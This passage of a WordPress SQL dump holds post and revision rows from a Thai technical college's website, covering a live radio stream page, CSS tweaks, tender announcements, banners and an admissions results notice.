(531, 1, '2018-01-07 18:35:15', '2018-01-07 11:35:15', '<div class=\"video-container\"><center>[Spider_Single_Video track=\"3\" theme_id=\"7\" priority=\"1\"]\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" width=\"640\" height=\"378\" frameborder=\"1\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"></iframe></center></div>', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 18:35:15', '2018-01-07 11:35:15', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(532, 1, '2018-01-07 19:00:01', '2018-01-07 12:00:01', '<div class=\"video-container\"><center>\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" width=\"640\" height=\"378\" frameborder=\"1\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"></iframe></center></div>\r\n\r\n<div id=\'player\'>\r\n <video width=\"352\" height=\"288\" src=\"http://live4.netdesignhost.com/technicrayonglive/technicrayonglive/playlist.m3u8\" controls autoplay>\r\n </video>\r\n </div>', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 19:00:01', '2018-01-07 12:00:01', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(533, 1, '2018-01-07 19:02:25', '2018-01-07 12:02:25', '<div class=\"video-container\"><center>\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" width=\"640\" height=\"378\" frameborder=\"1\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"></iframe></center></div>\r\n\r\n<div id=\'player\'>\r\n <video width=\"352\" height=\"288\" src=\"http://live4.netdesignhost.com/technicrayonglive/technicrayonglive/playlist.m3u8\" controls autoplay>\r\n </video>\r\n </div>\r\n\r\n<video width=\"352\" height=\"198\" controls>\r\n <source src=\"http://live4.netdesignhost.com/technicrayonglive/technicrayonglive/playlist.m3u8\" type=\"application/x-mpegURL\">\r\n</video>\r\n', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 19:02:25', '2018-01-07 12:02:25', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(534, 1, '2018-01-07 19:08:25', '2018-01-07 12:08:25', '<center>\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" frameborder=\"0\" scrolling=\"no\" allowtransparency=\"true\" width=\"640\" height=\"400\"></iframe>\r\n</center>', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 19:08:25', '2018-01-07 12:08:25', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(535, 1, '2018-01-07 19:25:17', '2018-01-07 12:25:17', '<center>\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" frameborder=\"0\" scrolling=\"no\" allowtransparency=\"true\" width=\"640\" height=\"400\"></iframe>\r\n\r\naa\r\n\r\n[videojs hls=\"http://live4.netdesignhost.com/technicrayonglive/technicrayonglive/playlist.m3u8\" autoplay=\"true\"]\r\n</center>\r\n\r\n', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 19:25:17', '2018-01-07 12:25:17', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(536, 1, '2018-01-07 19:33:25', '2018-01-07 12:33:25', '<center>\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" frameborder=\"0\" scrolling=\"no\" allowtransparency=\"true\" width=\"640\" height=\"400\"></iframe>\r\n\r\naa\r\n\r\n[videojs width=\"640\" height=\"340\" hls=\"http://live4.netdesignhost.com/technicrayonglive/technicrayonglive/playlist.m3u8\" autoplay=\"true\"]\r\n</center>\r\n\r\n', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 19:33:25', '2018-01-07 12:33:25', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(537, 1, '2018-01-07 19:35:46', '2018-01-07 12:35:46', '<center>\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" frameborder=\"0\" scrolling=\"no\" allowtransparency=\"true\" width=\"640\" height=\"400\"></iframe>\r\n\r\naa\r\n\r\n[videojs hls=\"http://live4.netdesignhost.com/technicrayonglive/technicrayonglive/playlist.m3u8\" autoplay=\"true\"]\r\n</center>\r\n\r\n', 'r-radio', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 19:35:46', '2018-01-07 12:35:46', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(540, 2, '2018-01-09 00:26:30', '2018-01-08 17:26:30', '<center><span style=\"color: #ff0000;\"><em><strong>Live</strong></em></span> R-Radio Network Rayong Technical College.\nถ่ายทอดสดพิธีเปิด อวท.ระดับภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๒๙ ปีการศึกษา ๒๕๖๐\nวันที่ ๙ มกราคม ๒๕๖๑ ณ โรงแรมซันธารา เวลเนส รีสอร์ท จัตั้งแต่เวลา 09.00 น. เป็นต้นไป\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" width=\"640\" height=\"400\" frameborder=\"0\" scrolling=\"no\"></iframe></center> ', 'Live R-Radio Network', '', 'inherit', 'closed', 'closed', '', '485-autosave-v1', '', '', '2018-01-09 00:26:30', '2018-01-08 17:26:30', '', 485, 'http://www.technicrayong.ac.th/485-autosave-v1/', 0, 'revision', '', 0),
(541, 2, '2018-01-07 23:36:11', '2018-01-07 16:36:11', '<center><em><strong>Live</strong></em> R-Radio Network Rayong Technical College\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" width=\"640\" height=\"400\" frameborder=\"0\" scrolling=\"no\"></iframe></center>aa\r\n\r\n[videojs hls=\"http://live4.netdesignhost.com/technicrayonglive/technicrayonglive/playlist.m3u8\" autoplay=\"true\"]', 'Live R-Radio Network', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 23:36:11', '2018-01-07 16:36:11', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(542, 2, '2018-01-07 23:39:59', '2018-01-07 16:39:59', '<center><em><strong>Live</strong></em> R-Radio Network Rayong Technical College\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" width=\"640\" height=\"400\" frameborder=\"0\" scrolling=\"no\"></iframe></center>aa\r\n\r\n[videojs hls=\"http://live4.netdesignhost.com/technicrayonglive/technicrayonglive/playlist.m3u8\" autoplay=\"true\"]', 'R-Radio Network', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 23:39:59', '2018-01-07 16:39:59', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(543, 2, '2018-01-07 23:41:23', '2018-01-07 16:41:23', '<center><em><strong>Live</strong></em> R-Radio Network Rayong Technical College.\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" width=\"640\" height=\"400\" frameborder=\"0\" scrolling=\"no\"></iframe></center>aa\r\n\r\n[videojs hls=\"http://live4.netdesignhost.com/technicrayonglive/technicrayonglive/playlist.m3u8\" autoplay=\"true\"]', 'R-Radio Network', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 23:41:23', '2018-01-07 16:41:23', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(544, 2, '2018-01-07 23:59:23', '2018-01-07 16:59:23', '<center><span style=\"color: #ff0000;\"><em><strong>Live</strong></em></span> R-Radio Network Rayong Technical College.\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" width=\"640\" height=\"400\" frameborder=\"0\" scrolling=\"no\"></iframe></center>aa\r\n\r\n[videojs hls=\"http://live4.netdesignhost.com/technicrayonglive/technicrayonglive/playlist.m3u8\" autoplay=\"true\"]', 'R-Radio Network', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-07 23:59:23', '2018-01-07 16:59:23', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(545, 2, '2018-01-09 00:23:49', '2018-01-08 17:23:49', '<center><span style=\"color: #ff0000;\"><em><strong>Live</strong></em></span> R-Radio Network Rayong Technical College.\r\nถ่ายทอดสดพิธีเปิด อวท.ระดับภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๒๙ ปีการศึกษา ๒๕๖๐\r\nณ โรงแรมซันธารา เวลเนส รีสอร์ท ตั้งแต่เวลา 09.00 น. เป็นต้นไป\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" width=\"640\" height=\"400\" frameborder=\"0\" scrolling=\"no\"></iframe></center> ', 'Live R-Radio Network', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-09 00:23:49', '2018-01-08 17:23:49', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(546, 2, '2018-01-09 00:25:28', '2018-01-08 17:25:28', '<center><span style=\"color: #ff0000;\"><em><strong>Live</strong></em></span> R-Radio Network Rayong Technical College.\r\nถ่ายทอดสดพิธีเปิด อวท.ระดับภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๒๙ ปีการศึกษา ๒๕๖๐\r\nวันที่ ๙ มกราคม ๒๕๖๑ ณ โรงแรมซันธารา เวลเนส รีสอร์ท ตั้งแต่เวลา 09.00 น. เป็นต้นไป\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" width=\"640\" height=\"400\" frameborder=\"0\" scrolling=\"no\"></iframe></center> ', 'Live R-Radio Network', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-09 00:25:28', '2018-01-08 17:25:28', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(547, 2, '2018-01-09 00:26:47', '2018-01-08 17:26:47', '<center><span style=\"color: #ff0000;\"><em><strong>Live</strong></em></span> R-Radio Network Rayong Technical College.\r\nถ่ายทอดสดพิธีเปิด อวท.ระดับภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๒๙ ปีการศึกษา ๒๕๖๐\r\nวันที่ ๙ มกราคม ๒๕๖๑ ณ โรงแรมซันธารา เวลเนส รีสอร์ท จังหวัดฉะเชิงเทรา ตั้งแต่เวลา 09.00 น. เป็นต้นไป\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" width=\"640\" height=\"400\" frameborder=\"0\" scrolling=\"no\"></iframe></center> ', 'Live R-Radio Network', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-09 00:26:47', '2018-01-08 17:26:47', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(548, 2, '2018-01-09 01:33:15', '2018-01-08 18:33:15', '<center><span style=\"color: #ff0000;\"><em><strong>Live</strong></em></span> R-Radio Network Rayong Technical College.\r\nถ่ายทอดสดพิธีเปิด อวท.ระดับภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๒๙ ปีการศึกษา ๒๕๖๐\r\nวันที่ ๙ มกราคม ๒๕๖๑ ณ โรงแรมซันธารา เวลเนส รีสอร์ท จังหวัดฉะเชิงเทรา ตั้งแต่เวลา ๐๙.๐๐ น. เป็นต้นไป\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" width=\"640\" height=\"400\" frameborder=\"0\" scrolling=\"no\"></iframe></center> ', 'Live R-Radio Network', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-09 01:33:15', '2018-01-08 18:33:15', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(549, 2, '2018-01-09 01:36:32', '2018-01-08 18:36:32', '<center><span style=\"color: #ff0000;\"><em><strong>Live</strong></em></span> <span style=\"color: #ff6600;\">R-Radio Network Rayong Technical College.</span>\r\n<span style=\"color: #0000ff;\"> ถ่ายทอดสดพิธีเปิด อวท.ระดับภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๒๙ ปีการศึกษา ๒๕๖๐</span>\r\n<span style=\"color: #ff6600;\">วันที่ ๙ มกราคม ๒๕๖๑</span> <span style=\"color: #0000ff;\">ณ โรงแรมซันธารา เวลเนส รีสอร์ท จังหวัดฉะเชิงเทรา ตั้งแต่เวลา ๐๙.๐๐ น. เป็นต้นไป</span>\r\n<iframe src=\"http://wwww.technicrayong.ac.th/TT.php\" width=\"640\" height=\"400\" frameborder=\"0\" scrolling=\"no\"></iframe></center> ', 'Live R-Radio Network', '', 'inherit', 'closed', 'closed', '', '485-revision-v1', '', '', '2018-01-09 01:36:32', '2018-01-08 18:36:32', '', 485, 'http://www.technicrayong.ac.th/485-revision-v1/', 0, 'revision', '', 0),
(569, 1, '2018-01-09 10:26:02', '2018-01-09 03:26:02', '.home-section-news-and-events .news-post:nth-child(2n+1) {\n clear: none;\n}\n\n.home-section-news-and-events .news-post {\n width: 33%;\n}\n\n.home-section-news-and-events .recent-news {\n display: none;\n}\n\n.home-section-news-and-events .recent-events {\n\n width: 100%;\n}\n\n#main-slider::before {\n background: none;\n}', 'university-hub-pro', '', 'inherit', 'closed', 'closed', '', '380-revision-v1', '', '', '2018-01-09 10:26:02', '2018-01-09 03:26:02', '', 380, 'http://www.technicrayong.ac.th/380-revision-v1/', 0, 'revision', '', 0),
(579, 3, '2018-01-10 14:34:34', '2018-01-10 07:34:34', '<a href=\"/wp-content/uploads/2018/01/student-equipmen-e-bidding-2561-02.pdf\">เอกสารประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)2561</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/02/tender-e-bidding1.jpg\"><img class=\"aligncenter size-large wp-image-1073\" src=\"/wp-content/uploads/2018/02/tender-e-bidding1-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/02/tender-e-bidding2.jpg\"><img class=\"aligncenter size-large wp-image-1074\" src=\"/wp-content/uploads/2018/02/tender-e-bidding2-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /></a>', 'ประกาศประกวดราคาซื้อเครื่องมือประจำตัวผู้เรียนเฉพาะอาชีพ ของนักเรียนสายอาชีพ ระดับ ปวช.1 ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์', ' ', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b9%80%e0%b8%84', '', '', '2018-02-11 15:41:32', '2018-02-11 08:41:32', '', 0, 'http://www.technicrayong.ac.th/?p=579', 488, 'post', '', 0),
(582, 3, '2018-01-10 14:30:07', '2018-01-10 07:30:07', '<a href=\"/wp-content/uploads/2018/01/เอกสารประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์-e-bidding2561-1.pdf\">เอกสารประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)2561</a>\r\n\r\n<img class=\"alignnone size-thumbnail wp-image-578\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding2.tif\" alt=\"\" width=\"1\" height=\"1\" /> <img class=\"alignnone size-thumbnail wp-image-577\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding1.tif\" alt=\"\" width=\"1\" height=\"1\" /><img class=\"alignnone size-thumbnail wp-image-577\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding1.tif\" alt=\"\" width=\"1\" height=\"1\" /><img class=\"alignnone wp-image-581\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding1-150x150.jpg\" alt=\"\" width=\"737\" height=\"737\" />\r\n\r\n \r\n\r\n<img class=\"alignnone wp-image-580\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding2-150x150.jpg\" alt=\"\" width=\"672\" height=\"672\" />', 'ประกาศประกวดราคาซื้อเครื่องมือประจำตัวผู้เรียนเฉพาะอาชีพ ของนักเรียนสายอาชีพ ระดับ ปวช.1 ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์', '', 'inherit', 'closed', 'closed', '', '579-revision-v1', '', '', '2018-01-10 14:30:07', '2018-01-10 07:30:07', '', 579, 'http://www.technicrayong.ac.th/579-revision-v1/', 0, 'revision', '', 0),
(583, 3, '2018-01-10 14:31:32', '2018-01-10 07:31:32', '<a href=\"/wp-content/uploads/2018/01/เอกสารประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์-e-bidding2561-1.pdf\">เอกสารประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)2561</a>\r\n\r\n \r\n\r\n<img class=\"alignnone size-thumbnail wp-image-578\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding2.tif\" alt=\"\" width=\"1\" height=\"1\" /> <img class=\"alignnone size-thumbnail wp-image-577\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding1.tif\" alt=\"\" width=\"1\" height=\"1\" /><img class=\"alignnone size-thumbnail wp-image-577\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding1.tif\" alt=\"\" width=\"1\" height=\"1\" /><img class=\"wp-image-581 aligncenter\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding1-150x150.jpg\" alt=\"\" width=\"514\" height=\"514\" />\r\n\r\n \r\n\r\n<img class=\"wp-image-580 aligncenter\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding2-150x150.jpg\" alt=\"\" width=\"571\" height=\"571\" />', 'ประกาศประกวดราคาซื้อเครื่องมือประจำตัวผู้เรียนเฉพาะอาชีพ ของนักเรียนสายอาชีพ ระดับ ปวช.1 ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์', '', 'inherit', 'closed', 'closed', '', '579-revision-v1', '', '', '2018-01-10 14:31:32', '2018-01-10 07:31:32', '', 579, 'http://www.technicrayong.ac.th/579-revision-v1/', 0, 'revision', '', 0),
(584, 3, '2018-01-10 14:34:34', '2018-01-10 07:34:34', '<a href=\"/wp-content/uploads/2018/01/เอกสารประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์-e-bidding2561-1.pdf\">เอกสารประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)2561</a>\r\n\r\n \r\n\r\n<img class=\"alignnone size-thumbnail wp-image-578\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding2.tif\" alt=\"\" width=\"1\" height=\"1\" /> <img class=\"alignnone size-thumbnail wp-image-577\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding1.tif\" alt=\"\" width=\"1\" height=\"1\" /><img class=\"alignnone size-thumbnail wp-image-577\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding1.tif\" alt=\"\" width=\"1\" height=\"1\" /><img class=\"aligncenter wp-image-581 size-full\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding1.jpg\" alt=\"\" width=\"1656\" height=\"2339\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-580 size-full\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding2.jpg\" alt=\"\" width=\"1656\" height=\"2339\" />', 'ประกาศประกวดราคาซื้อเครื่องมือประจำตัวผู้เรียนเฉพาะอาชีพ ของนักเรียนสายอาชีพ ระดับ ปวช.1 ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์', '', 'inherit', 'closed', 'closed', '', '579-revision-v1', '', '', '2018-01-10 14:34:34', '2018-01-10 07:34:34', '', 579, 'http://www.technicrayong.ac.th/579-revision-v1/', 0, 'revision', '', 0),
(586, 1, '2018-01-10 15:01:31', '2018-01-10 08:01:31', '.home-section-news-and-events .news-post:nth-child(2n+1) {\n clear: none;\n}\n\n.home-section-news-and-events .news-post {\n width: 33%;\n}\n\n.home-section-news-and-events .recent-news {\n display: none;\n}\n\n.home-section-news-and-events .recent-events {\n\n width: 100%;\n}\n\n#main-slider::before {\nbackground: none;\n}\n\n#main-slider::after {\nbackground: none;\n}\n', 'university-hub-pro', '', 'inherit', 'closed', 'closed', '', '380-revision-v1', '', '', '2018-01-10 15:01:31', '2018-01-10 08:01:31', '', 380, 'http://www.technicrayong.ac.th/380-revision-v1/', 0, 'revision', '', 0),
(587, 1, '2018-01-12 16:14:47', '2018-01-12 09:14:47', '<a href=\"/wp-content/uploads/2018/01/201801121551.jpg\"><img class=\"aligncenter wp-image-588\" src=\"/wp-content/uploads/2018/01/201801121551-725x1024.jpg\" alt=\"\" width=\"1080\" height=\"1526\" /></a>', 'ชี้แจงการประกวดราคาซื้อเครื่องมือประจำตัวผู้เรียน ตามเอกสารประกวดราคา ข้อ 4.5', '', 'publish', 'closed', 'open', '', '%e0%b8%8a%e0%b8%b5%e0%b9%89%e0%b9%81%e0%b8%88%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%8b%e0%b8%b7%e0%b9%89', '', '', '2018-01-21 14:53:25', '2018-01-21 07:53:25', '', 0, 'http://www.technicrayong.ac.th/?p=587', 486, 'post', '', 0),
(589, 1, '2018-01-12 16:14:47', '2018-01-12 09:14:47', '<a href=\"/wp-content/uploads/2018/01/201801121551.jpg\"><img class=\"aligncenter size-large wp-image-588\" src=\"/wp-content/uploads/2018/01/201801121551-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /></a>', 'ชี้แจงการประกวดราคาซื้อเครื่องมือประจำตัวผู้เรียน ตามเอกสารประกวดราคา ข้อ 4.5', '', 'inherit', 'closed', 'closed', '', '587-revision-v1', '', '', '2018-01-12 16:14:47', '2018-01-12 09:14:47', '', 587, 'http://www.technicrayong.ac.th/587-revision-v1/', 0, 'revision', '', 0),
(590, 1, '2018-01-12 16:15:29', '2018-01-12 09:15:29', '<a href=\"/wp-content/uploads/2018/01/201801121551.jpg\"><img class=\"aligncenter wp-image-588\" src=\"/wp-content/uploads/2018/01/201801121551-725x1024.jpg\" alt=\"\" width=\"800\" height=\"1130\" /></a>', 'ชี้แจงการประกวดราคาซื้อเครื่องมือประจำตัวผู้เรียน ตามเอกสารประกวดราคา ข้อ 4.5', '', 'inherit', 'closed', 'closed', '', '587-revision-v1', '', '', '2018-01-12 16:15:29', '2018-01-12 09:15:29', '', 587, 'http://www.technicrayong.ac.th/587-revision-v1/', 0, 'revision', '', 0),
(591, 1, '2018-01-12 16:16:03', '2018-01-12 09:16:03', '<a href=\"/wp-content/uploads/2018/01/201801121551.jpg\"><img class=\"aligncenter wp-image-588\" src=\"/wp-content/uploads/2018/01/201801121551-725x1024.jpg\" alt=\"\" width=\"1080\" height=\"1526\" /></a>', 'ชี้แจงการประกวดราคาซื้อเครื่องมือประจำตัวผู้เรียน ตามเอกสารประกวดราคา ข้อ 4.5', '', 'inherit', 'closed', 'closed', '', '587-revision-v1', '', '', '2018-01-12 16:16:03', '2018-01-12 09:16:03', '', 587, 'http://www.technicrayong.ac.th/587-revision-v1/', 0, 'revision', '', 0),
(592, 1, '2018-01-12 17:14:55', '2018-01-12 10:14:55', '', 'RTC-Banner-2017-1080-200-06', '', 'inherit', 'closed', 'closed', '', 'rtc-banner-2017-1080-200-06', '', '', '2018-01-12 17:14:55', '2018-01-12 10:14:55', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/RTC-Banner-2017-1080-200-06.png', 0, 'attachment', 'image/png', 0),
(594, 1, '2018-01-12 17:15:00', '2018-01-12 10:15:00', '', 'RTC-Banner-2017-1080-200-04', '', 'inherit', 'closed', 'closed', '', 'rtc-banner-2017-1080-200-04', '', '', '2018-01-12 17:15:00', '2018-01-12 10:15:00', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/RTC-Banner-2017-1080-200-04.png', 0, 'attachment', 'image/png', 0),
(595, 1, '2018-01-12 17:15:03', '2018-01-12 10:15:03', '', 'RTC-Banner-2017-1080-200-05', '', 'inherit', 'closed', 'closed', '', 'rtc-banner-2017-1080-200-05', '', '', '2018-01-12 17:15:03', '2018-01-12 10:15:03', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/RTC-Banner-2017-1080-200-05.png', 0, 'attachment', 'image/png', 0),
(598, 1, '2018-01-12 17:21:52', '2018-01-12 10:21:52', '', 'RTC-Banner-2017-1080-200-08', '', 'inherit', 'closed', 'closed', '', 'rtc-banner-2017-1080-200-08', '', '', '2018-01-12 17:21:52', '2018-01-12 10:21:52', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/RTC-Banner-2017-1080-200-08.png', 0, 'attachment', 'image/png', 0),
(599, 1, '2018-01-12 17:39:32', '2018-01-12 10:39:32', '', 'เว็บเก่า', '', 'publish', 'closed', 'closed', '', '%e0%b9%80%e0%b8%a7%e0%b9%87%e0%b8%9a%e0%b9%80%e0%b8%81%e0%b9%88%e0%b8%b2', '', '', '2022-04-29 12:30:36', '2022-04-29 05:30:36', '', 0, 'http://www.technicrayong.ac.th/?p=599', 102, 'nav_menu_item', '', 0),
(600, 1, '2018-01-12 17:45:31', '2018-01-12 10:45:31', '', 'News', '', 'publish', 'closed', 'closed', '', 'news', '', '', '2018-01-12 18:47:34', '2018-01-12 11:47:34', '', 0, 'http://www.technicrayong.ac.th/?page_id=600', 0, 'page', '', 0),
(601, 1, '2018-01-12 17:45:31', '2018-01-12 10:45:31', '', 'new', '', 'inherit', 'closed', 'closed', '', '600-revision-v1', '', '', '2018-01-12 17:45:31', '2018-01-12 10:45:31', '', 600, 'http://www.technicrayong.ac.th/600-revision-v1/', 0, 'revision', '', 0),
(606, 1, '2018-01-12 18:47:34', '2018-01-12 11:47:34', '', 'News', '', 'inherit', 'closed', 'closed', '', '600-revision-v1', '', '', '2018-01-12 18:47:34', '2018-01-12 11:47:34', '', 600, 'http://www.technicrayong.ac.th/600-revision-v1/', 0, 'revision', '', 0),
(607, 1, '2018-01-12 18:52:58', '2018-01-12 11:52:58', '', 'Events', '', 'publish', 'closed', 'closed', '', 'events', '', '', '2018-01-12 18:52:58', '2018-01-12 11:52:58', '', 0, 'http://www.technicrayong.ac.th/?page_id=607', 0, 'page', '', 0),
(608, 1, '2018-01-12 18:52:58', '2018-01-12 11:52:58', '', 'Events', '', 'inherit', 'closed', 'closed', '', '607-revision-v1', '', '', '2018-01-12 18:52:58', '2018-01-12 11:52:58', '', 607, 'http://www.technicrayong.ac.th/607-revision-v1/', 0, 'revision', '', 0),
(611, 1, '2018-01-13 21:47:28', '2018-01-13 14:47:28', '<h4><a href=\"/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน</a>\r\n<a href=\"/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก</a></h4>\r\n<strong><span style=\"color: #0000ff;\">มีปัญหาในการสมัครออนไลน์ โทร 094-5166653</span></strong>\r\n\r\n<img class=\"aligncenter size-large wp-image-294\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-01-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-293\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-02-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-292\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-03-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" />', 'ประกาศผลการคัดเลือกนักศึกษาโควตา หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา 2561', ' ', 'inherit', 'closed', 'closed', '', '287-revision-v1', '', '', '2018-01-13 21:47:28', '2018-01-13 14:47:28', '', 287, 'http://www.technicrayong.ac.th/287-revision-v1/', 0, 'revision', '', 0),
(616, 1, '2018-01-15 16:03:48', '2018-01-15 09:03:48', '', 'Banner-RTC', '', 'publish', 'closed', 'closed', '', 'new-slideshow', '', '', '2018-01-16 15:14:13', '2018-01-16 08:14:13', '', 0, 'http://www.technicrayong.ac.th/?post_type=ml-slider&p=616', 0, 'ml-slider', '', 0),
